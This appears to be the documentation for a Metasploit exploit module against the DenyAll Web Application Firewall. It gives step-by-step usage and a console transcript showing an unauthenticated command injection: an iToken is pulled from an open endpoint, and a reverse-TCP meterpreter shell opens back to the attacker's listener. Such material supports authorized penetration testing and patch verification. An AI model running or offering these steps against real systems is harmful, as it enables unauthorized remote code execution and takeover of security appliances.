## Vulnerable Application
This module exploits a command injection vulnerability in the DenyAll Web Application Firewall. Unauthenticated users can execute terminal commands in the context of the web server user.
A 15-day trial demo is available on the Amazon Marketplace:
[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911)
Follow the instructions at the URL above.
## Verification Steps
A successful check of the exploit will look like this:
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/denyall_exec`
- [ ] Set `RHOST`
- [ ] Set `LHOST`
- [ ] Run `check`
- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing the `iToken` value extraction.
- [ ] **Verify** that you are getting a `meterpreter` session.
## Scenarios
```
msf > use exploit/linux/http/denyall_exec
msf exploit(denyall_exec) >
msf exploit(denyall_exec) > set RHOST 35.176.123.128
RHOST => 35.176.123.128
msf exploit(denyall_exec) > set LHOST 35.12.3.3
LHOST => 35.12.3.3
msf exploit(denyall_exec) > check
[*] 35.176.123.128:3001 The target appears to be vulnerable.
msf exploit(denyall_exec) > exploit
[*] Started reverse TCP handler on 35.12.3.3:4444
[*] Extracting iToken value from unauthenticated accessible endpoint.
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
[*] Triggering command injection vulnerability with iToken value.
[*] Sending stage (40411 bytes) to 35.176.123.128
[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300
meterpreter > pwd
/var/log/denyall/reverseproxy
meterpreter >
```